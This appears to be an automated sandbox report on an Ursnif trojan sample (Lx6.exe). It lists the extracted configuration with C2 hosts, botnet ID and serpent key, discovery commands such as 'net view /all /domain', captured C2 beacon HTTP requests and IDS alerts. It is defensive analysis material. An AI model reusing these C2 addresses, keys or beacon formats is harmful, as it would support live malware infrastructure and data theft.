Source: 0.2.Lx6.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen7

Source: Lx6.exe

Malware Configuration Extractor: Ursnif {"RSA Public Key": "t3qotb1uLz0WQBQfwLqib6qEJZE+UWboYbVA8D0wT+tWlc5qtQDeaqzOC2nQDK16TGqueaW5oGs4CGiO/MdFt2KusjJx8+1kpFAzW86uZJOIIf4iTEkhS3MyiIa/Q7lcVfHfnxpB+UbYYggJs5GX2bL7AmnKln9+gOVwUuO7JAeDw+DtYHnZsQ5QWiILRjbhzgULABNMELryH3vhxO50soxjs3xWLliZ7NkotkIovW5lDNqd0O2XXyoOurxXjuZGPEbbhRZBpHdWEhqREXH1enS9abglL6UWQWXDddw6a+cdOzlsIkv4dFlHNnlldLue5uJRFh2QmHZUYokW7tGSKTbEnFyrm9DfIThSGsj+rn4=", "c2_domain": ["tel12.msn.com", "194.76.225.60", "185.212.47.133"], "botnet": "1900", "server": "50", "serpent_key": "0FL5S9PzrGv40a6p", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Source: Lx6.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: .C:\Users\user\AppData\Local\Temp\iyr5jfx4.pdb source: powershell.exe, 00000004.00000002.797557745.0000021F39EFC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: Lx6.exe, 00000000.00000003.448194501.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdbXP"x source: powershell.exe, 00000004.00000002.798921671.0000021F39F62000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: Lx6.exe, 00000000.00000003.448194501.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdb source: powershell.exe, 00000004.00000002.798534347.0000021F39F41000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdbr\|* source: powershell.exe, 00000004.00000003.449394272.0000021F4DAA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\iyr5jfx4.pdbXP"x source: powershell.exe, 00000004.00000002.798092069.0000021F39F20000.00000004.00000800.00020000.00000000.sdmp

Spreading

Performs a network lookup / discovery via net view

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_00768664 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00752299 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00761577 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075154D FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03022299 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0302154D FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03031577 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: apnfy.msn.com
Source: C:\Windows\explorer.exe	Domain query: www.msn.com

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49698 -> 52.169.118.173:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49698 -> 52.169.118.173:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49700 -> 194.76.225.60:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49700 -> 194.76.225.60:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49701 -> 52.169.118.173:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49703 -> 194.76.225.61:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49703 -> 194.76.225.61:80
Source: Traffic	Snort IDS: 2021814 ET TROJAN Ursnif Variant CnC Beacon 3 192.168.2.4:49703 -> 194.76.225.61:80

Uses nslookup.exe to query domains

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: global traffic	HTTP traffic detected: GET /doorway/j2Kh1F01rzc/C8YfqfqOL0fd_2/Faja_2BeyQazoCIhY8EM9/jtWW9dUBZLJi2O8c/5bSyBdVOxMEWaUX/ShuObsG4WHyjfvJOvS/7Etsx6H8b/xJ9ufj3B90qCwQfbGxOr/E6EEqhpsHuAJvMjEWxJ/bbt9tD_2FAMRZ0X6mUy9CA/ykkOKoxULnECB/ejdchRP6/xdR6yPCPWIpLVR5uBosZgJc/ZByIsZgREK/Fk_2Feeg2_2Bk9KT9/iLNnOQl_2B8z/5ltZk0GHQaA/kR9XvP8sc8BQlA/LXFn1z6p/VlTMdML3/9.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doorway/BIhFC1DHq0NxSqN_2Fq5v/hicggKY4SgwJPP6D/F4xxZuIhTddt0HO/A_2B6u1ukXktqk9I1N/03tCA2eZF/F2lX7Km3UL6Oc40qXR7I/S_2Bu_2F1gAnwxNSHl_/2B_2BIw1VXdQgjLWDGSvzH/6KsVMipemRsxc/s39L4jXr/llySx2Z4YWz6hWH3fehvPN_/2B4i_2B9D9/MRxPcto8_2FTKi6Ul/Lo0znElngJCM/KVK8xvLBVm9/FogU94tV1Oz3NS/xOy9YP2f0yNELqTpaSapG/CGthTWmcja_2By_2/BWnMuFbG2_2/FigtxC.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.com
Source: global traffic	HTTP traffic detected: GET /de-ch/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NTk3NzIzMjYsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NjE0OTA5OTMsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic	HTTP traffic detected: GET /de-ch/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI2MjMzNjk0MDQsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic	HTTP traffic detected: GET /doorway/uRv392Rtz866/nti_2ByAL1r/R8CkJ_2BndSyRx/sIG44fcYL4SmExCi0ACI7/oER1nF0Bt2Tpxtf8/pvf2xzyDmqE4uH6/atElJIeiaCGvRyaYTW/O_2Bb7sZx/7GOqqpJyOKdZvhgFoplL/gFpgB_2BgQj834VvyfM/T9x1pruFqGyVhzjoXgN9Yh/z5CHc_2FavqJW/MXQOJsyO/VzU5_2FcjvOlXkGZhClQ7RM/oSy78PufE2/FJvd3_2FTRM8OrG4Y/ryVNLZn8s_2B/KVoRzz7Jpgf/a.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doorway/bRzGSLjweAbH/PVfy51BTQqO/lWZDAcFYwrYEOw/P1069Ds4xjESTY05mmd1_/2ByVzroc4cimG4A8/PzkyhLRGCX0aFw5/Jtve4MdzfQJPkPgA2k/NTDeHmvoJ/_2B7yHjl7zuPv_2Brki5/vNALnLBqmQChxlgwPJX/YMRMYrIxai4T4_2BKHDViB/Hv_2BBzVFkjNS/FgarEETc/294Vv6pgzz58Ssm8O4z7jEg/g3Dq3u6_2B/toSBBRie0B5BZcweG/l7bNSU7DgvscLKrC/Sp3p.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doorway/b6wMkPt4iWosnbXK8RWvn/wQ2bkOJqcdbdcNhg/tg0Z3ks_2FXcWvb/njy6I8DMVjfhayfvGk/AHmjUevns/VlDNJo0_2B7BLsOhWepg/SFW_2F2h4VyZK2j7bvO/pwSb1f2R_2B4_2FNz_2Fk5/AtvhdDlWA69Wm/XRrBsoYg/JvQOOWqnl_2BSVvJf6ZjHAL/wi1PXKezi1/T9UASDBDRIpvMBY_2/FoQu0ao4VHCM/ZdN_2Bl0_2B/R_2BeX3PT9oLhg/3PUDsQH9gNCwUAZWN3W4_/2BLY_2F_2F1_2F3U/UklFvieJ/d91ke0Bg/KsQU9iQ.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doorway/8DqiRUYpN1g/urg4gk8belU2Hp/6R_2FaNTBZnVkLTOVWhaX/cRir_2FDANkaaRhV/ClRbP8o7eYAfvcj/15sk13GdbMsMo5M_2F/JnE3OOrX1/Yn3LiAEserhxrqJvZEPb/e6YS2cNRsGxIjllZdqY/7_2FRYI58Sw6j4ExBQcowc/5qMbTW7lnZmjK/j8COe_2F/4naQldFBQDlP42ux0j7rpPZ/VYnkJGg8xi/iWRQWDs2GHiDVoqIT/U1cLh8zIJ54C/3jdFHxCPndA/7QWrJ8HiTz2ZrO/n84c0VWLTOO/rD8u.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Content-Length: 54Connection: Keep-AliveCache-Control: no-cacheData Raw: 31 31 2d 31 30 2d 32 30 32 32 20 31 35 3a 30 34 3a 32 35 20 7c 20 22 30 78 61 61 61 34 39 34 65 37 5f 36 33 31 34 63 64 34 36 63 34 66 66 35 22 20 7c 20 30 0d 0a Data Ascii: 11-10-2022 15:04:25 \| "0xaaa494e7_6314cd46c4ff5" \| 0

Source: Lx6.exe, 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: Lx6.exe, 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: RuntimeBroker.exe, 00000013.00000002.860670049.000002240CD05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858831162.000001D023E05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856155256.000001489B505000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856115183.00000191D3AAF000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000043.00000002.778448031.000001FA9DC8D000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000059.00000002.827104369.000001AF8BB9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://curlmyip.net
Source: powershell.exe, 0000002D.00000002.856115183.00000191D3AAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://curlmyip.net1g
Source: RuntimeBroker.exe, 00000013.00000002.860670049.000002240CD05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858831162.000001D023E05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856155256.000001489B505000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000043.00000002.778448031.000001FA9DC8D000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000059.00000002.827104369.000001AF8BB9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://curlmyip.net1g71lXXnduT6klnGfile://c:
Source: Lx6.exe, 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: cvtres.exe, 00000059.00000002.827104369.000001AF8BB9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io/ip
Source: RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.ux
Source: RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobp/E
Source: RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.micro/1
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ogp.me/ns#
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ogp.me/ns/fb#
Source: powershell.exe, 00000004.00000002.561587239.0000021F35781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.558784999.0000021F35581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.861404017.00000191D4411000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/d7cb56b9-/direction=ltr.l
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA12OBYj.img?h=368&
Source: powershell.exe, 00000004.00000002.561587239.0000021F35781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000000E.00000000.541728807.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.481741357.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.517838181.0000000008260000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/de-ch
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/de-ch/
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0/t.js?qsp=true&anoncknm=%22%22&name=%22M
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Lx6.exe, 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.388832296.000000000131B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: powershell.exe, 00000004.00000002.561587239.0000021F35781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1665493296&rver=7.0.6730.0&am
